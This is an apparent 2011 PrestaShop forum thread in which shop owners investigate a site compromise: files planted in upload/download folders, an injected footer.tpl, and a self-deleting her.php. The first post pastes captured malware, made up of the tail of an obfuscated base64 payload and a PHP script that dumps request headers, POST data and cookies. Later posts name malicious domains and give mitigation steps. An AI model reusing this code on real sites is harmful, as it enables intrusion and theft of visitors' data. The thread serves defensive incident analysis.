/vN73tPTt3vHL0+9hfdm9+Oz0/rDo4M/Mvlv3sKYHvzxYPJb/ZejU6Id66WpP0qm/sH9lxdEN82p3d98mD9v/zjYPT492Xv7+nQ36Zf+C5ib0C8cn+pbgh+8P/ZVmX1YroIesSR4GZH28f14Nth9sqD63tdhqdXblvZcNG50xL68PCAklNDVPaZDkrSdpOLC0y+7N5vZwq8v+jQpCP2OGLlZNKxNMhFEd0UbsFI3ojH7NHND/3MiSt5A+Dfo8YUVhlxGHEoEutnY3PxvSlyYPbuRCH5836mBfdlAbgpuuDJeqclw2K2Lw47lt1UYpxe3VvhV0Z7lE59ux3uvj073uk+ePTtGmYkF/fBP9p2SJmRe43XfbIktLepnVUuxMv1baLpaQwoexYIQUtIWNhRCAChSIQT02EgL+dqhIkwtqhRg8+cHXRkROM4GPVqkI6fm+g7DKS3JBfKtjXgy2+jNajPfquqHiwxBhP7w2ow7mLNweFlSgqWFj6zR2Ri4lxs4ucjXMfvRMl/DTW4PsSf+66xZxJz5FfuLjUJ3xjhRFGUdGT4ro31Gfs/0BlS2lje9n9f0vmi6wbXd1vp+buu1hM2/vzv6d+iOvtkd38TlHu8mQavXdnJCbpQcpXhNbbLmZOqMopDZeNalb+VKledhCjpVAMQSQnxVIECQAfLu5KgLmwB6ehQQGNSBYjpg9g5GdBihXoaK9cDFm7oXYzcE9p+iyDp6PFz+YglbQE7EXOqLbMRTRwYu1R5CeSSqLu8vuthnVjrPo/eGFLgRPNXh7xsmiBHH1AC0T9z+AcaK5wplaYmmI8QMy6hJN6vv+H4XL9FdLFUEiippqKn6fwE='\x29\x29\x29\x3B",".");}?> <?php error_reporting(0); $empty = ""; function filt($data) { if (is_array($data)){ $datanew = ""; foreach ($data as $key=>$val) { $datanew .= htmlspecialchars(stripslashes($key)."=".stripslashes($val))."&"; } } else { $datanew = $data; $datanew = htmlspecialchars(stripslashes($datanew)); } return $datanew; } if(isset($_SERVER['HTTP_FORWARDED_FOR'])) $DATA_HTTP_FORWARDED_FOR=filt($_SERVER['HTTP_FORWARDED_FOR']); else $DATA_HTTP_FORWARDED_FOR=$empty; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) $DATA_HTTP_X_FORWARDED_FOR=filt($_SERVER['HTTP_X_FORWARDED_FOR']); else $DATA_HTTP_X_FORWARDED_FOR=$empty; if(isset($_SERVER['HTTP_FROM'])) $DATA_HTTP_FROM=filt($_SERVER['HTTP_FROM']); else $DATA_HTTP_FROM=$empty; if(isset($_SERVER['HTTP_CLIENT_IP'])) $DATA_HTTP_CLIENT_IP=filt($_SERVER['HTTP_CLIENT_IP']); else $DATA_HTTP_CLIENT_IP=$empty; if(isset($_SERVER['HTTP_HTTP_VIA'])) $DATA_HTTP_HTTP_VIA=filt($_SERVER['HTTP_HTTP_VIA']); else $DATA_HTTP_HTTP_VIA=$empty; if(isset($_SERVER['HTTP_XROXY_CONNECTION'])) $DATA_HTTP_XROXY_CONNECTION=filt($_SERVER['HTTP_XROXY_CONNECTION']); else $DATA_HTTP_XROXY_CONNECTION=$empty; if(isset($_SERVER['HTTP_PROXY_CONNECTION'])) $DATA_HTTP_PROXY_CONNECTION=filt($_SERVER['HTTP_PROXY_CONNECTION']); else $DATA_HTTP_PROXY_CONNECTION=$empty; if(isset($_SERVER['HTTP_PROXY_USER'])) $DATA_HTTP_PROXY_USER=filt($_SERVER['HTTP_PROXY_USER']); else $DATA_HTTP_PROXY_USER=$empty; if(isset($_SERVER['HTTP_PC_REMOTE_ADDR'])) $DATA_HTTP_PC_REMOTE_ADDR=filt($_SERVER['HTTP_PC_REMOTE_ADDR']); else $DATA_HTTP_PC_REMOTE_ADDR=$empty; if(isset($_SERVER['HTTP_X_REMOTECLIENT_IP'])) $DATA_HTTP_X_REMOTECLIENT_IP=filt($_SERVER['HTTP_X_REMOTECLIENT_IP']); else $DATA_HTTP_X_REMOTECLIENT_IP=$empty; if(isset($_SERVER['HTTP_PROXY_PORT'])) $DATA_HTTP_PROXY_PORT=filt($_SERVER['HTTP_PROXY_PORT']); else $DATA_HTTP_PROXY_PORT=$empty; if(isset($_SERVER['HTTP_USER_AGENT'])) $DATA_HTTP_USER_AGENT=filt($_SERVER['HTTP_USER_AGENT']); else $DATA_HTTP_USER_AGENT=$empty; if(isset($_SERVER['HTTP_REFERER'])) $DATA_HTTP_REFERER=filt($_SERVER['HTTP_REFERER']); else $DATA_HTTP_REFERER=$empty; if(isset($_SERVER['HTTP_ACCEPT'])) $DATA_HTTP_ACCEPT=filt($_SERVER['HTTP_ACCEPT']); else $DATA_HTTP_ACCEPT=$empty; if(isset($_SERVER['HTTP_CONNECTION'])) $DATA_HTTP_CONNECTION=filt($_SERVER['HTTP_CONNECTION']); else $DATA_HTTP_CONNECTION=$empty; if(isset($_SERVER['GATEWAY_INTERFACE'])) $DATA_GATEWAY_INTERFACE=filt($_SERVER['GATEWAY_INTERFACE']); else $DATA_GATEWAY_INTERFACE=$empty; if(isset($_SERVER['REQUEST_METHOD'])) $DATA_REQUEST_METHOD=filt($_SERVER['REQUEST_METHOD']); else $DATA_REQUEST_METHOD=$empty; if(isset($_COOKIE)) $_COOKIE=filt($_COOKIE); else $_COOKIE=$empty; if(isset($_POST)) $_POST=filt($_POST); else $_POST=$empty; $data = "<pre>REQUEST_INFO_PAGE_4896485_CODE REMOTE_ADDR=".filt($_SERVER['REMOTE_ADDR'])." HTTP_CLIENT_IP=".$DATA_HTTP_CLIENT_IP." HTTP_X_FORWARDED_FOR=".$DATA_HTTP_X_FORWARDED_FOR." HTTP_X_FORWARDED=".$DATA_HTTP_FORWARDED_FOR." HTTP_X_COMING_FROM= HTTP_FORWARDED_FOR=".$DATA_HTTP_FORWARDED_FOR." HTTP_FORWARDED= HTTP_COMING_FROM= HTTP_VIA=".$DATA_HTTP_HTTP_VIA." HTTP_XROXY_CONNECTION=".$DATA_HTTP_XROXY_CONNECTION." HTTP_PROXY_CONNECTION=".$DATA_HTTP_PROXY_CONNECTION." HTTP_USER_AGENT=".$DATA_HTTP_USER_AGENT." HTTP_ACCEPT=".$DATA_HTTP_ACCEPT." HTTP_CONNECTION=".$DATA_HTTP_CONNECTION." GATEWAY_INTERFACE=".$DATA_GATEWAY_INTERFACE." REQUEST_METHOD=".$DATA_REQUEST_METHOD." HTTP_REFERER=".$DATA_HTTP_REFERER." POST=".$_POST." COOKIE=".$_COOKIE." </pre> "; echo $data; ?> Link to comment Share on other sites More sharing options...
plwm Posted August 23, 2011 Share Posted August 23, 2011 Hi, Same problem in 1.4.4 on a local install of prestashop. My apache shows that the her.php file appeared just after a serie of admin actions. Here are the last : 127.0.0.1 - - [23/Aug/2011:23:27:54 +0200] "POST [...my_local_admin]/ajax.php HTTP/1.1" 200 - "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0" 127.0.0.1 - - [23/Aug/2011:23:27:58 +0200] "POST [...my_local_admin]/ajax.php?toggleScreencast HTTP/1.1" 200 - "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0" 127.0.0.1 - - [23/Aug/2011:23:27:55 +0200] "POST /[...my_local_admin]/index.php?tab=AdminModules&token=c76a0756b0d565653ca9aabf3e5a35e HTTP/1.1" 200 301411 "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0" ---- and now the her php file------ 127.0.0.1 - - [23/Aug/2011:23:27:59 +0200] "GET /[...my_local_module_folder]/her.php HTTP/1.1" 200 - "http://localhost/_____Gedone/_Cap_Expresso/html/www2.capexpresso.com/admincap/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0" But i can't find her.php in my modules folder... And now my IE (that i rarely open) opens itself on http://ads.eorezo.com/cgi-bin/advert/getads?x_...... My two other sites (1.3.6 not upgraded to 1.4)on online servers don't seem to be affected by this problem... Link to comment Share on other sites More sharing options...
hege Posted August 23, 2011 Share Posted August 23, 2011 same problem: - e66943f1495e1631affdbddae8398209.php file in the download and upload folder - script in the footer.tpl my shop ver is 1.4.2.5 is there any modification that is have to check? if you find the solution for this hack, please tell us how can we protect the site not with just a new release (it not possible for me to update to a newer release) regards, Gabor Link to comment Share on other sites More sharing options...
SonnyBoyII Posted August 23, 2011 Share Posted August 23, 2011 Same problem... interesting thing is I have a few prestashops on my server in the same, root directory but in different folders, just one of these was attacked (PS.1.4.3)... Link to comment Share on other sites More sharing options...
ct1976 Posted August 23, 2011 Share Posted August 23, 2011 would you advise going back to an older version? replaced footer.tpl removed several dogdy looking image files for house, pharmacy, car sales in Modules\avoir\ folder??!! index.php had been amended smarty.v2 removed and now reinstated Link to comment Share on other sites More sharing options...
SonnyBoyII Posted August 23, 2011 Share Posted August 23, 2011 I forgot to mention, it happened to me before, a month ago!, I restored the whole shop and database. Unfortunately, I didn't check if there is any strange additional file or modification or not. Link to comment Share on other sites More sharing options...
AKJV Posted August 24, 2011 Share Posted August 24, 2011 I did check for other added or modified files when I discovered the hack, by searching for all files with a recent timestamp. The only, apparent, changes I could find have already been reported in this topic. In short, these are the changes: 1)a script is added to the footer.tpl file in the active theme folder 2)a php file is created in both /upload and /download folders 3).htaccess file in /download folder is deleted 4) tools/smarty/compile, tools/smarty/cache and tools/smarty_v2 are deleted (I haven't checked this myself) 5) if you're lucky enough to catch it, there is a her.php file in your /modules folder. But this file deletes itself after the hack attempt. I would advise to check all this in your own installation and if needed restore a backup of your footer.tpl, delete the alien php files, restore .htaccess file in /download folder (not necessary if this folder is empty) and restore the smarty folders. In addition, it is also important to change your password for access of your BO (though I think this info is send encrypted to the hackers but just to be safe) and to change the username/password of your database access (and change this in your BO accordingly). Also, recompile and clear the cache (enable 'Force compile' and disable 'Cache' in your 'Preferences' tab in your BO and do a refresh of your website; don't forget to revert the settings afterwards). And hopefully the Prestashop developers will find out the source of all this quickly. Link to comment Share on other sites More sharing options...
plwm Posted August 24, 2011 Share Posted August 24, 2011 same problem: - e66943f1495e1631affdbddae8398209.php file in the download and upload folder - script in the footer.tpl Idem with 1.4.4.0 on local install. Link to comment Share on other sites More sharing options...
Alaskan Posted August 24, 2011 Share Posted August 24, 2011 same problem: - e66943f1495e1631affdbddae8398209.php file in the download and upload folder - script in the footer.tpl Idem with 1.4.4.0 on local install. Same issues here. Found extra files in both download and upload folders. Tried to revert to older backup files and it added an .htaccess to one of the folders. What is the status of this situation? Does PS have a solution? This is very serious. Link to comment Share on other sites More sharing options...
J D K Posted August 24, 2011 Share Posted August 24, 2011 We were affected as well. v1.4.3. Can confirm that smarty_v2 was deleted, there was the extra files in download and upload and the footer.tpl was changed (it wasn't the default template either which was interesting). My install of PS had all the modules so I'm going through and deleting the unused ones. Link to comment Share on other sites More sharing options...
Slava Posted August 24, 2011 Share Posted August 24, 2011 server log at about 5 min. before and 5 min after her.php(17:26:00) Hope it is helpful Edit: Domain name is changed. Just for security log.txt Link to comment Share on other sites More sharing options...
jesan Posted August 24, 2011 Share Posted August 24, 2011 Hi All, I'm new to PrestaShop and just made my shop live, I was just browsing the forum and come across this Hack I checked my files and it seems I have the same problem. I deleted the .php files in the upload download folder got rid of the strange code inside the footer.tpl it appears my main htaccess file was not altered added the htaccess redir as suggested in redit I'm considering a new install but, what if I get infected again? any advice tks jesan Link to comment Share on other sites More sharing options...
ruilong Posted August 24, 2011 Share Posted August 24, 2011 Looks like there are a few similair calls made. however, it's 3 hours between. xx.xxx.xxx.xxx - - [23/Aug/2011:13:27:30 +0200] "POST /admindir/index.php?tab=AdminModules&token=8a94cca32ee3c07af0bf7322428e09cc HTTP/1.1" 200 29229 "http://www.domainname.com/admindir/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17" yy.yyy.yy.yy - - [23/Aug/2011:16:33:36 +0200] "GET /sv/hem HTTP/1.1" 200 25448 "http://www.google.se/url?sa=t&source=web&cd=5&ved=0CEAQFjAE&url=http%3A%2F%2Fwww.domainname.com%2F&rct=j&q=domainname.com%2Bher.php&ei=rLpTTu-PG4aJrAeV6t3DDg&usg=AFQjCNFhhEF9BsO6NxutBpe4kvvZNPG1iA&cad=rjt" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0" Link to comment Share on other sites More sharing options...
titooooom Posted August 24, 2011 Share Posted August 24, 2011 I got afected too. so sad =( a lot of lost and resourses wasted. =( If need anything to solve this let me know. =) Looks like there are a few similair calls made. however, it's 3 hours between. xx.xxx.xxx.xxx - - [23/Aug/2011:13:27:30 +0200] "POST /admindir/index.php?tab=AdminModules&token=8a94cca32ee3c07af0bf7322428e09cc HTTP/1.1" 200 29229 "http://www.domainname.com/admindir/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17" yy.yyy.yy.yy - - [23/Aug/2011:16:33:36 +0200] "GET /sv/hem HTTP/1.1" 200 25448 "http://www.google.se/url?sa=t&source=web&cd=5&ved=0CEAQFjAE&url=http%3A%2F%2Fwww.domainname.com%2F&rct=j&q=domainname.com%2Bher.php&ei=rLpTTu-PG4aJrAeV6t3DDg&usg=AFQjCNFhhEF9BsO6NxutBpe4kvvZNPG1iA&cad=rjt" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0" Link to comment Share on other sites More sharing options...
ruilong Posted August 24, 2011 Share Posted August 24, 2011 I got afected too. so sad =( a lot of lost and resourses wasted. =( If need anything to solve this let me know. =) My guess at this time is that we are dealing with some kind of malware, that has infected your computer, this malware then uses the module upload feature in Prestashop to upload this file. I would suggest the following until a more permanent fix is made. 1. Either remove write permission on modules folder, or uncomment the following code from /admin/tabs/adminModules.php function extractArchive($file) { /* global $currentIndex; $success = false; if (substr($file, -4) == '.zip') { if (!Tools::ZipExtract($file, _PS_MODULE_DIR_)) $this->_errors[] = Tools::displayError('Error while extracting module (file may be corrupted).'); } else { $archive = new Archive_Tar($file); if ($archive->extract(_PS_MODULE_DIR_)) $success = true; else $this->_errors[] = Tools::displayError('Error while extracting module (file may be corrupted).'); } @unlink($file); if ($success) Tools::redirectAdmin($currentIndex.'&conf=8'.'&token='.$this->token); */ } 2. Make sure your computer is safe! Scan for malware/viruses, use an up to date antivirus software. Make sure you have a firewall installed, even if you are behind a router, it is good to have a software firewall, especially if you use a wireless network at home or at work. Link to comment Share on other sites More sharing options...
MikeChoy Posted August 24, 2011 Share Posted August 24, 2011 Test upgrading to SVN8151 version and saw the problem. Don't think its from localhost machine. Observation: her.php file added upload dir with additional file dowload dir with additional file themes/prestashop/footer.tpl altered smarty/cache/* changed smarty/compile/* changed Categories FO not showing 3rd party homecarousel not working anymore Link to comment Share on other sites More sharing options...
jesusruiz Posted August 24, 2011 Share Posted August 24, 2011 My shop is not affected. I haven't the file her.php, nor the file footer.tpl affected. My hosting is Spanish and my shop is only available in Spanish. It is odd that affected stores, and sometimes not. Could it be that the virus appears for a module such as Facebook?. Prestashop 1.4.4 Link to comment Share on other sites More sharing options...
Rolo Tomasi Posted August 24, 2011 Share Posted August 24, 2011 OK this has just happen to me again. Yesterday my store went down and after reading this thread, I deleted the php file in the upload/download folders and reverted to the original footer file. I also had to reinstall the tools/smarty/compile and tools/smarty/cache folders along with smarty_v2 folder. After this everything seemed OK. This morning exactly the same thing has happened again. This needs sorting ASAP. Link to comment Share on other sites More sharing options...
thehandlestudio Posted August 24, 2011 Share Posted August 24, 2011 I have just had my site restored by my host Vidahost I had tried to replace the tools directory and I still had problems with the log in page as there was a security error coming up in browser. So the only way that would eliminate this was to restore all the files and everything seems back to normal now. Regards, Mark. Link to comment Share on other sites More sharing options...
trippodo Posted August 24, 2011 Share Posted August 24, 2011 I checked my store files and it seems I have the same problem. I deleted the .php files in the upload and download folder and restored footer.tpl i have also deleted all files in smarty/cache and smarty/compile I did not find the file her.php in modules folder prestashop 1.4.4.0 Link to comment Share on other sites More sharing options...
Carl Favre Posted August 24, 2011 Share Posted August 24, 2011 As Mike said, the whole team is working on this issue. We are trying to fix it as fast as possible. We will keep you informed of any progress. Be assured that we do not take this problem lightly and that we are totally dedicated to fixing it. Link to comment Share on other sites More sharing options...
dazzza Posted August 24, 2011 Share Posted August 24, 2011 Just checked my sites & my clients sites & it seems to be only 1.4.3 & 1.4.4 affected so far. One site is in maintenance mode & was still affected. I'm now going to try a clean install on wamp & see what the logs say after. Link to comment Share on other sites More sharing options...
Raphaël Malié Posted August 24, 2011 Share Posted August 24, 2011 Hello, can you search in your full log apache the word "her.php" and copy all found lines here ? If you are under linux : cat /path/to/your/apache/log | grep "her.php" Link to comment Share on other sites More sharing options...
Julien Breux Posted August 24, 2011 Share Posted August 24, 2011 Hi all, I run an audit on my customers and partners. I hope that isn't my menu but above all isn't PrestaShop ! Ju' Link to comment Share on other sites More sharing options...
Ruben86 Posted August 24, 2011 Share Posted August 24, 2011 Same problems here! The shop went offline after my smarty_v2 folder content was removed. I can't find her.php. Already any suggestions for a fix? Link to comment Share on other sites More sharing options...
Raphaël Malié Posted August 24, 2011 Share Posted August 24, 2011 Hello, for all people affected by this problem, if possible we need your apache log to check how this issue happened on your site and try to correct it the faster possible. You can send your logs to Carl. Regards Link to comment Share on other sites More sharing options...
dazzza Posted August 24, 2011 Share Posted August 24, 2011 (edited) Last entry line in Apache log after local install on wamp 127.0.0.1 - - [24/Aug/2011:10:31:57 +0200] "GET /test_virus/modules/her.php HTTP/1.1" 200 - Then the her.php has gone but footer.tpl has been modified. PrestaShop 1.4.4 BTW this was a clean install with no extra modules. Zip downloaded from PrestaShop on 20/08/11 Edited August 24, 2011 by dazzza (see edit history) Link to comment Share on other sites More sharing options...
PurpleEdge Posted August 24, 2011 Share Posted August 24, 2011 Hello, for all people affected by this problem, if possible we need your apache log to check how this issue happened on your site and try to correct it the faster possible. You can send your logs to Carl. Regards Attached is my log from this morning. I installed niceforms and jbx_menu modules yesterday onto other sites on local host - these sites use the default theme and weren't affected. I installed jbx_menu on this site this morning and shortly after the footer.tpl file in a custom theme was affected. I can upload earlier logs if necessary - there is no other reference to her.php in my logs. PurpleEdge.zip Link to comment Share on other sites More sharing options...
guest* Posted August 24, 2011 Share Posted August 24, 2011 I'm using jbx_menu as well... Can all the people who have posted here and encountered the same problem confirm that they are using this menu? I use the blocktopmenu from JBX too. No hack at all. BUT I run on an IIS (no Apache) which has no .htaccess so the script will not work, I too use a module called protect.tpl from samhda. It helps to protect your theme if script name are not known... I use Geo-Targeting to block all the countries I don't sell to and for known bad-behaviour countries (listed on project honeypot or other similar.) I run several bot-traps and firewall security on my server, because I've had a hacked server in the past with php-BB-forum software. The security theme is a wide complexe theme and it does not mean that file xy was hacked, that this file was the reason for the hack. In most cases some other open JS are the reason for intrusions AND no software is really secure... You must make your server secure to be not hacked. Link to comment Share on other sites More sharing options...
Maxence de Flotte Posted August 24, 2011 Share Posted August 24, 2011 I can upload earlier logs if necessary - there is no other reference to her.php in my logs. I found it on line 256: 127.0.0.1 - - [24/Aug/2011:09:44:13 +1000] "GET /ozhealth_local/modules/her.php HTTP/1.1" 200 - Thanks for all these details. Best regards, Link to comment Share on other sites More sharing options...
spott Posted August 24, 2011 Share Posted August 24, 2011 Hi One of my costumer has the same problem. I restored his site. Right now I don't have server logs to look, when and how the her.php file was added. Link to comment Share on other sites More sharing options...
MikeChoy Posted August 24, 2011 Share Posted August 24, 2011 This is my test finding. Using SVN version_8151 to do a fresh installation (localhost) Immediately after installation...access FO ---> no her.php file found Then try access to BO by keying in password ---> her.php file was generated No other files found in upload and download directory Footer.tpl not altered ==continuing with further monitoring & testing Please find attached access.log for your investigation. access.txt Link to comment Share on other sites More sharing options...
dazzza Posted August 24, 2011 Share Posted August 24, 2011 Local host site on wamp connects to erabaglanti.ka.hn & the little square at the bottom is an iframe from http://clickmeml.fileave.com Link to comment Share on other sites More sharing options...
Huot Sébastien Posted August 24, 2011 Share Posted August 24, 2011 Same problem here, i found it when the function slidetoggle didn't work anymore.. Lucky me Any fix or updates ? Link to comment Share on other sites More sharing options...
jLangevin Posted August 24, 2011 Share Posted August 24, 2011 Hi, I have 3 stores 1 has been infected version 1.4.3 site was in maintenance mode new php files in upload and download smarty_v2 erased footer.tpl altered can't find her.php Link to comment Share on other sites More sharing options...
emilioSH Posted August 24, 2011 Share Posted August 24, 2011 sorry Link to comment Share on other sites More sharing options...
Raphaël Malié Posted August 24, 2011 Share Posted August 24, 2011 Hello, for those who can reproduce this bug in localhost, can you please remade an install, and before you do any action on your prestashop please add the following code : if ($_POST) { $fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a'); fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n"); fclose($fd); } bellow the code function __construct() { in file admin/tabs/adminModules.php. Once you have noticed the presence of her.php infection, please send me per MP the log file her_log.txt in your Prestashop root folder, thank you Link to comment Share on other sites More sharing options...
ElRapazGrande Posted August 24, 2011 Share Posted August 24, 2011 I have the problem too on a 1.4.4 Prestashop. Found it yesterday at about 6pm Paris time. I removed my active theme directory by FTP, I uploaded a clean one, it worked again, but this morning it was infected again. Link to comment Share on other sites More sharing options...
Klixin Posted August 24, 2011 Share Posted August 24, 2011 I got hacked too, website comes up with error 500. I deleted the sus files as mentioned but I still get error 500. How do I fix to get my client back online? error log: [24-Aug-2011 17:22:00] PHP Fatal error: require_once() [<a href='function.require'>function.require</a>]: Failed opening required '/home/thumpmus/public_html/tools/smarty_v2/Smarty.class.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/thumpmus/public_html/config/smarty.config.inc.php on line 33 Link to comment Share on other sites More sharing options...
Vincent Schoener Posted August 24, 2011 Share Posted August 24, 2011 I'm curious for those infected what operating system you use ? But as said Raphael, it's coming after the call of AdminModule We keep you informed about any news. Best regards Link to comment Share on other sites More sharing options...
Maxence de Flotte Posted August 24, 2011 Share Posted August 24, 2011 I got hacked too, website comes up with error 500. I deleted the sus files as mentioned but I still get error 500. How do I fix to get my client back online? error log: [24-Aug-2011 17:22:00] PHP Fatal error: require_once() [<a href='function.require'>function.require</a>]: Failed opening required '/home/thumpmus/public_html/tools/smarty_v2/Smarty.class.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/thumpmus/public_html/config/smarty.config.inc.php on line 33 Hi, Try to re-upload your prestashop. And check: - /tools/smarty_v2/ exists - /modules/her.php do NOT exists Best regards, Link to comment Share on other sites More sharing options...
thehandlestudio Posted August 24, 2011 Share Posted August 24, 2011 I'm curious for those infected what operating system you use ? But as said Raphael, it's coming after the call of AdminModule We keep you informed about any news. Best regards Hi Vincent, I am using a linux operating system if that helps. Regards, Mark. Link to comment Share on other sites More sharing options...
jLangevin Posted August 24, 2011 Share Posted August 24, 2011 I'm curious for those infected what operating system you use ? I'm working on OSX 10.5.8 and for hosting this is Linux Apache/2.2.14 (Unix) PHP: 5.2.5 MySQL: 5.1.44 Thanks Link to comment Share on other sites More sharing options...
Raphaël Malié Posted August 24, 2011 Share Posted August 24, 2011 Hello, for those who can reproduce this bug in localhost, can you please remade an install, and before you do any action on your prestashop please add the following code : if ($_POST) { $fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a'); fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n"); fclose($fd); } bellow the code function __construct() { in file admin/tabs/adminModules.php. Once you have noticed the presence of her.php infection, please send me per MP the log file her_log.txt in your Prestashop root folder, thank you Link to comment Share on other sites More sharing options...
Johann Posted August 24, 2011 Share Posted August 24, 2011 Also infected on at least two sites (1.4.4.0), but apparently not all my PS sites. But I have to ftp access at the office... One of the infected sites has absolutety no additional modules (it's a test site). Hosted on a Linux Debian OS. Websites uploaded from my Windows 7 (with MS Essential Security) and Filezilla. Link to comment Share on other sites More sharing options...
Raphaël Malié Posted August 24, 2011 Share Posted August 24, 2011 For those who can reproduce this bug at localhost, if you can provide us an access ssh to your server BEFORE just after a new install, this would be a great help. You can send it to me per PM. Regards Link to comment Share on other sites More sharing options...
philee Posted August 24, 2011 Share Posted August 24, 2011 Windows 7 OS. Prestashop 1.4.4 My site was fine at 6:00pm 8/23 then at 7:58 pm 5/23 I noticed my site isn't functioning properly. I sent a ticket to my host and this was found. Removed: /home/sfbm/public_html/videos/wp-content/themes/zzz/scripts/cache/dd58e9270114ad1f95c0e3da514a2b6c.php: PHP.Hide.UNOFFICIAL FOUND /home/sfbm/public_html/videos/wp-content/themes/zzz/scripts/cache/7e30804b68501ac775c35e1db21b502f.php: PHP.Hide.UNOFFICIAL FOUND /home/sfbm/public_html/webstore/download/647226b6ef10264fb0c2c5336a924ef7.php: Atomicorp.honeypot.hex.php.cmdshell.unclassed.338.UNOFFICIAL FOUND /home/sfbm/public_html/webstore/upload/647226b6ef10264fb0c2c5336a924ef7.php: Atomicorp.honeypot.hex.php.cmdshell.unclassed.338.UNOFFICIAL FOUND The attacker was able to access my account by using your store's admin interface. /usr/local/apache/domlogs/sfbm/-----.com: IP ADDRESS - - [23/Aug/2011:19:18:12 -0500] "POST /webstore/admin/ajax.php HTTP/1.1" 200 20 "http://-----.com/webstore/admin/index.php?tab=AdminTools&token=a14d47e372b19cd728aace" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/IP ADDRESS Safari/ADDRESS" Now my whole ajax categories and cart is messed up. Site doesn't function the same anymore. Detected when I was browsing my store. UPDATE: 8/24 3:32 AM Link to comment Share on other sites More sharing options...
feltu Posted August 24, 2011 Share Posted August 24, 2011 Guys i'm one of the people been hacked here is what i found: 92.200.123.234 - - [24/Aug/2011:05:28:44 -0400] "GET /cms.php?id_cms=1 HTTP/1.1" 503 1220 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD" 92.200.123.234 - - [24/Aug/2011:05:28:44 -0400] "GET /themes/xx/css/maintenance.css HTTP/1.1" 200 623 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD" 92.200.123.234 - - [24/Aug/2011:05:28:44 -0400] "GET /img/admin/tab-tools.gif HTTP/1.1" 200 351 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD" 92.200.123.234 - - [24/Aug/2011:05:28:44 -0400] "GET /img/logo.jpg HTTP/1.1" 200 3683 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD" 92.200.123.234 - - [24/Aug/2011:05:28:45 -0400] "GET /img/favicon.ico HTTP/1.1" 200 1148 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD" 92.200.123.234 - - [24/Aug/2011:05:28:51 -0400] "GET /product.php?id_product=xx HTTP/1.1" 503 1189 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD" the ip address i lookup and found this: % This is the RIPE Database query service. % The objects are in RPSL format. % % The RIPE Database is subject to Terms and Conditions. % See http://www.ripe.net/db/support/db-terms-conditions.pdf % Information related to '92.200.0.0 - 92.220.255.255' inetnum: 92.200.0.0 - 92.220.255.255 netname: QSC-WHOLESALE-1 descr: QSC AG Dynamic IP Addresses country: DE admin-c: QSC1-RIPE tech-c: QSC1-RIPE status: ASSIGNED PA mnt-by: QSC-NOC mnt-lower: QSC-NOC remarks: *********************************** remarks: * For spam, portscans, hacks, ... * remarks: * please contact to *****@qsc.de * remarks: *********************************** changed: *************@NOSPAM.qsc.de 20091021 source: RIPE role: QSC Internet Services address: QSC AG address: Mathias-Brueggen-Str. 55 address: D-50829 Koeln address: Germany phone: +49 221 66 98 000 fax-no: +49 221 66 98 009 e-mail: *****@qsc.de remarks: ******************************************** remarks: QSC AG - Network Design Department remarks: remarks: Fuer Fragen zu SPAM, Portscans, Trojanern remarks: usw. wenden Sie sich bitte an *****@qsc.de remarks: remarks: To report SPAM/UCE/Portscans/Hacks please remarks: contact *****@qsc.de. remarks: remarks: For peering requests, BGP policy changes remarks: etc. contact *******@NOSPAM.qsc.de. For remarks: Routing issues ******@NOSPAM.qsc.de. Please remarks: remove NOSPAM. from email address. remarks: ******************************************** admin-c: RH168-RIPE tech-c: RH168-RIPE tech-c: ARB-RIPE tech-c: MH6797-RIPE tech-c: BF359-RIPE tech-c: MD1900-RIPE tech-c: GHM-RIPE tech-c: CV1903 nic-hdl: QSC1-RIPE mnt-by: QSC-NOC changed: *************@NOSPAM.qsc.de 20080605 changed: *************@NOSPAM.qsc.de 20081027 changed: **************@NOSPAM.qsc.de 20090511 source: RIPE % Information related to '92.192.0.0/11AS20676' route: 92.192.0.0/11 descr: QSC AG origin: AS20676 mnt-by: QSC-NOC mnt-lower: QSC-NOC changed: ************@NOSPAM.qsc.de 20071017 source: RIPE Link to comment Share on other sites More sharing options...
chemapresta Posted August 24, 2011 Share Posted August 24, 2011 Local host site on wamp connects to erabaglanti.ka.hn & the little square at the bottom is an iframe Hi, Me too !! PS 1.4.1.0 Link to comment Share on other sites More sharing options...
